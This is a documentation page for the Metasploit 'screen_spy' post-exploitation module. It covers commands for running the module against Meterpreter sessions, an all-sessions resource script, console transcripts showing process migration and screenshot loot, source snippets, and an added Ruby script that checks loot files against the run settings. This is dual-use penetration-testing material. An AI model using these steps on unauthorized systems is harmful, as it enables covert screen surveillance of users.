Windows Gather Screen Spy - Metasploit
This page contains detailed information about how to use the post/windows/gather/screen_spy Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather Screen Spy
Module: post/windows/gather/screen_spy
Source code: modules/post/windows/gather/screen_spy.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. Note: As of March, 2014, the VIEW_CMD option has been removed in favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but not how) the collected screenshots will be viewed from the Metasploit interface.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/screen_spy
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/screen_spy
msf post(screen_spy) > show options
... show and set options ...
msf post(screen_spy) > set SESSION session-id
msf post(screen_spy) > exploit
If you wish to run the post module against all sessions from the framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/screen_spy")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction.
Note: As of March, 2014, the VIEW_CMD option has been removed in favor of the Boolean VIEW_SCREENSHOTS option, which will control if (but not how) the collected screenshots will be viewed from the Metasploit interface.
Verification Steps
- Start msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/screen_spy
- Do:
set SESSION <session id>
- Do:
run
Options
RECORD
If set to true, record all screenshots to disk by saving them to loot.
PID
PID to migrate into before taking the screenshots. If no PID is specified, the module defaults to the current PID.
Scenarios
Windows 10 20H2 (No Database Connected But RECORD Flag Set)
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 1 yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[-] RECORD flag specified however the database is not connected, so no loot can be stored!
[*] Post module execution completed
Windows 10 20H2 (No Database Connected, RECORD flag not set)
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD false yes Record all screenshots to disk by saving them to loot
SESSION 2 yes The session to run this module on.
VIEW_SCREENSHOTS true no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
Windows 10 20H2 (No Database Connected, RECORD flag not set, PID set to Process to Migrate To)
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps -aux
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
.....
8236 1288 taskhostw.exe
8296 760 svchost.exe
8424 888 RuntimeBroker.exe x64 2 DESKTOP-KUO5CML\test C:\Windows\System32\RuntimeBroker.exe
8572 3340 MeSuAx.exe
8636 760 svchost.exe
8664 8036 putty.exe x64 2 DESKTOP-KUO5CML\test C:\Program Files\PuTTY\putty.exe
.....
meterpreter > background
[*] Backgrounding session 2...
msf6 post(windows/gather/screen_spy) > set PID 8664
PID => 8664
msf6 post(windows/gather/screen_spy) > run
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
Windows 10 20H2 (Database Connected, RECORD flag set)
msf6 > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 2 yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) > loot
Loot
====
host            service  type                  name              content    info        path
----            -------  ----                  ----              -------    ----        ----
172.25.128.214           screenspy.screenshot  screenshot.0.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135019_default_172.25.128.214_screenspy.screen_098612.jpg
172.25.128.214           screenspy.screenshot  screenshot.1.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135024_default_172.25.128.214_screenspy.screen_176753.jpg
172.25.128.214           screenspy.screenshot  screenshot.2.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135029_default_172.25.128.214_screenspy.screen_057554.jpg
172.25.128.214           screenspy.screenshot  screenshot.3.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135034_default_172.25.128.214_screenspy.screen_187603.jpg
172.25.128.214           screenspy.screenshot  screenshot.4.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135039_default_172.25.128.214_screenspy.screen_397543.jpg
172.25.128.214           screenspy.screenshot  screenshot.5.jpg  image/jpg  Screenshot  /home/gwillcox/.msf4/loot/20210412135044_default_172.25.128.214_screenspy.screen_498562.jpg
msf6 post(windows/gather/screen_spy) >
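The loot listing in the last scenario is the only durable record of what the module captured, so whoever reviews the evidence after an authorized test (or triages a host where such loot naming turns up) wants a way to check it against the settings that produced it. The following is an added example, not code from the Metasploit module or from this page: it parses the loot paths shown above and verifies that the number of captures equals COUNT and that consecutive captures are about DELAY seconds apart. The file-name layout (timestamp_workspace_host_type_random.ext, with the loot type cut to 16 characters, which is why "screenspy.screenshot" appears as "screenspy.screen" in the paths) is inferred from the sample output and is an assumption, not a documented contract; the sample paths are copied from the scenario above.

```ruby
require 'time'

# Added example (not part of the Metasploit module or this page): a parser for
# the loot paths that `loot -t screenspy.screenshot` prints, used to check that
# the recorded captures match the COUNT/DELAY settings of the run.
#
# Assumed layout, inferred from the sample output:
#   YYYYmmddHHMMSS_workspace_host_ltype_random.ext
# where ltype is the loot type truncated to 16 characters.
LOOT_NAME = /\A(?<ts>\d{14})_(?<workspace>[^_]+)_(?<host>[^_]+)_(?<ltype>[^_]+)_(?<rand>\d{6})\.(?<ext>\w+)\z/

# Constructed sample: the six paths from the "Database Connected" scenario.
SAMPLE_PATHS = %w[
  /home/gwillcox/.msf4/loot/20210412135019_default_172.25.128.214_screenspy.screen_098612.jpg
  /home/gwillcox/.msf4/loot/20210412135024_default_172.25.128.214_screenspy.screen_176753.jpg
  /home/gwillcox/.msf4/loot/20210412135029_default_172.25.128.214_screenspy.screen_057554.jpg
  /home/gwillcox/.msf4/loot/20210412135034_default_172.25.128.214_screenspy.screen_187603.jpg
  /home/gwillcox/.msf4/loot/20210412135039_default_172.25.128.214_screenspy.screen_397543.jpg
  /home/gwillcox/.msf4/loot/20210412135044_default_172.25.128.214_screenspy.screen_498562.jpg
].freeze

# Parse one loot path into its fields. Returns nil when the basename does not
# follow the assumed layout, so callers can flag stray or renamed files.
def parse_loot_path(path)
  m = LOOT_NAME.match(File.basename(path))
  return nil unless m

  {
    time: Time.strptime(m[:ts], '%Y%m%d%H%M%S'),
    workspace: m[:workspace],
    host: m[:host],
    ltype: m[:ltype],
    ext: m[:ext],
    path: path
  }
end

# Check a set of loot paths against the settings that produced them: the number
# of captures must equal COUNT, every capture must come from the same host, and
# consecutive captures must be about DELAY seconds apart. Timestamps in the
# file names have one-second resolution, hence the tolerance.
def verify_capture_run(paths, count:, delay:, tolerance: 1)
  entries = paths.map { |p| parse_loot_path(p) }
  problems = []
  problems << 'unparseable loot name(s)' if entries.any?(&:nil?)
  entries = entries.compact
  problems << "expected #{count} captures, found #{entries.size}" unless entries.size == count

  hosts = entries.map { |e| e[:host] }.uniq
  problems << "captures span multiple hosts: #{hosts.join(', ')}" if hosts.size > 1

  times = entries.map { |e| e[:time] }.sort
  gaps = times.each_cons(2).map { |a, b| (b - a).to_i }
  gaps.each_with_index do |g, i|
    next if (g - delay).abs <= tolerance

    problems << "gap #{i + 1} is #{g}s, expected about #{delay}s"
  end

  { ok: problems.empty?, problems: problems, gaps: gaps, hosts: hosts }
end

# Usage:
#   result = verify_capture_run(SAMPLE_PATHS, count: 6, delay: 5)
#   result[:ok]   #=> true
#   result[:gaps] #=> [5, 5, 5, 5, 5]
```

Running it over the six sample paths yields five gaps of 5 seconds, matching DELAY 5 and COUNT 6 from the scenario; passing a different COUNT or DELAY, or a path whose name does not follow the layout, produces a problem list instead of a silent pass.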
Msfconsole Usage
Here is how the windows/gather/screen_spy post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > show info
Name: Windows Gather Screen Spy
Module: post/windows/gather/screen_spy
Platform: Windows
Arch:
Rank: Normal
Provided by:
Roni Bachar <[email protected]>
bannedit <[email protected]>
kernelsmith <kernelsmith /x40 kernelsmith /x2E com>
Adrian Kubok
DLL_Cool_J
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
Description:
This module will incrementally take desktop screenshots from the
host. This allows for screen spying which can be useful to determine
if there is an active user on a machine, or to record the screen for
later data extraction. Note: As of March, 2014, the VIEW_CMD option
has been removed in favor of the Boolean VIEW_SCREENSHOTS option,
which will control if (but not how) the collected screenshots will
be viewed from the Metasploit interface.
Module Options
This is a complete list of options available in the windows/gather/screen_spy post exploitation module:
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/screen_spy post exploitation module:
msf6 post(windows/gather/screen_spy) > show advanced
Module advanced options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/screen_spy module can do:
msf6 post(windows/gather/screen_spy) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/screen_spy post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/screen_spy) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Unsupported Platform
- Failed to load espia extension (<E>)
- Error taking the screenshot: <E.CLASS> <E> <E.BACKTRACE>
- RECORD flag specified however the database is not connected, so no loot can be stored!
- Error storing screenshot: <E.CLASS> <E> <E.BACKTRACE>
- Error deleting the temporary screenshot file: <E.CLASS> <E> <E.BACKTRACE>
- This may be due to the file being in use if you are on a Windows platform
- Migration failed! Unable to take a screenshot under the desired process!
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Unsupported Platform
Here is a relevant code snippet related to the "Unsupported Platform" error message:
    if datastore['PID'] != ''
      migrate
    end

    if session.platform !~ /windows/i
      print_error('Unsupported Platform')
      return
    end

    begin
      session.core.use('espia')
Failed to load espia extension (<E>)
Here is a relevant code snippet related to the "Failed to load espia extension (<E>)" error message:
    end

    begin
      session.core.use('espia')
    rescue ::Exception => e
      print_error("Failed to load espia extension (#{e})")
      return
    end

    begin
      count = datastore['COUNT']
Error taking the screenshot: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error taking the screenshot: <E.CLASS> <E> <E.BACKTRACE>" error message:
      count.times do |num|
        select(nil, nil, nil, datastore['DELAY'])
        begin
          data = session.espia.espia_image_get_dev_screen
        rescue Rex::Post::Meterpreter::RequestError => e
          print_error("Error taking the screenshot: #{e.class} #{e} #{e.backtrace}")
          return false
        end
        if data
          if record?
            if framework.db.active
RECORD flag specified however the database is not connected, so no loot can be stored!
Here is a relevant code snippet related to the "RECORD flag specified however the database is not connected, so no loot can be stored!" error message:
            if framework.db.active
              # let's loot it using non-clobbering filename, even tho this is the source filename, not dest
              fn = "screenshot.%0#{leading_zeros}d.jpg" % num
              file_locations << store_loot('screenspy.screenshot', 'image/jpg', session, data, fn, 'Screenshot')
            else
              print_error('RECORD flag specified however the database is not connected, so no loot can be stored!')
              return false
            end
          end

          # also write to disk temporarily so we can display in browser.
Error storing screenshot: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error storing screenshot: <E.CLASS> <E> <E.BACKTRACE>" error message:
            screenshot_path = "file://#{screenshot}"
            Rex::Compat.open_browser(screenshot_path)
          end
        end
    rescue IOError, Errno::ENOENT => e
      print_error("Error storing screenshot: #{e.class} #{e} #{e.backtrace}")
      return
    end
    print_status('Screen Spying Complete')
    if record? && framework.db.active && file_locations && !file_locations.empty?
      print_status 'run loot -t screenspy.screenshot to see file locations of your newly acquired loot'
Error deleting the temporary screenshot file: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error deleting the temporary screenshot file: <E.CLASS> <E> <E.BACKTRACE>" error message:
        sleep 2
        vprint_status "Deleting temporary screenshot file: #{screenshot}"
        begin
          ::File.delete(screenshot)
        rescue StandardError => e
          print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}")
          print_error('This may be due to the file being in use if you are on a Windows platform')
        end
      end
    end

This may be due to the file being in use if you are on a Windows platform
Here is a relevant code snippet related to the "This may be due to the file being in use if you are on a Windows platform" error message:
        vprint_status "Deleting temporary screenshot file: #{screenshot}"
        begin
          ::File.delete(screenshot)
        rescue StandardError => e
          print_error("Error deleting the temporary screenshot file: #{e.class} #{e} #{e.backtrace}")
          print_error('This may be due to the file being in use if you are on a Windows platform')
        end
      end
    end

  def migrate
Migration failed! Unable to take a screenshot under the desired process!
Here is a relevant code snippet related to the "Migration failed! Unable to take a screenshot under the desired process!" error message:
  def migrate
    begin
      session.core.migrate(datastore['PID'].to_i)
      print_good('Migration successful')
      return datastore['PID']
    rescue StandardError
      fail_with(Failure::Unknown, 'Migration failed! Unable to take a screenshot under the desired process!')
      return nil
    end
  end
end
Related Pull Requests
- #14994 Merged Pull Request: Updating screen_spy.rb to have a PID option for session migration
- #10165 Merged Pull Request: Fix missing RequestError in a few post modules
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2525 Merged Pull Request: Change module boilerplate
- #1412 Merged Pull Request: post/windows/gather/screenspy was kinda busted, this fixes it
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #958 Merged Pull Request: Msftidy 2
See Also
Check also the following modules related to this module:
- post/windows/gather/ad_to_sqlite
- post/windows/gather/arp_scanner
- post/windows/gather/avast_memory_dump
- post/windows/gather/bitcoin_jacker
- post/windows/gather/bitlocker_fvek
- post/windows/gather/bloodhound
- post/windows/gather/cachedump
- post/windows/gather/checkvm
- post/windows/gather/dnscache_dump
- post/windows/gather/dumplinks
- post/windows/gather/enum_ad_bitlocker
- post/windows/gather/enum_ad_computers
- post/windows/gather/enum_ad_groups
- post/windows/gather/enum_ad_managedby_groups
- post/windows/gather/enum_ad_service_principal_names
- post/windows/gather/enum_ad_to_wordlist
- post/windows/gather/enum_ad_user_comments
- post/windows/gather/enum_ad_users
- post/windows/gather/enum_applications
- post/windows/gather/enum_artifacts
- post/windows/gather/exchange
- post/windows/gather/file_from_raw_ntfs
- post/windows/gather/get_bookmarks
- post/windows/gather/hashdump
- post/windows/gather/local_admin_search_enum
- post/windows/gather/lsa_secrets
- post/windows/gather/make_csv_orgchart
- post/windows/gather/memory_dump
- post/windows/gather/memory_grep
- post/windows/gather/netlm_downgrade
- post/windows/gather/ntds_grabber
- post/windows/gather/ntds_location
- post/windows/gather/outlook
- post/windows/gather/phish_windows_credentials
- post/windows/gather/psreadline_history
- post/windows/gather/resolve_sid
- post/windows/gather/reverse_lookup
- post/windows/gather/smart_hashdump
- post/windows/gather/tcpnetstat
- post/windows/gather/usb_history
- post/windows/gather/win_privs
- post/windows/gather/wmic_command
- post/windows/gather/word_unc_injector
Authors
- Roni Bachar <roni.bachar.blog[at]gmail.com>
- bannedit
- kernelsmith <kernelsmith /x40 kernelsmith /x2E com>
- Adrian Kubok
- DLL_Cool_J
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.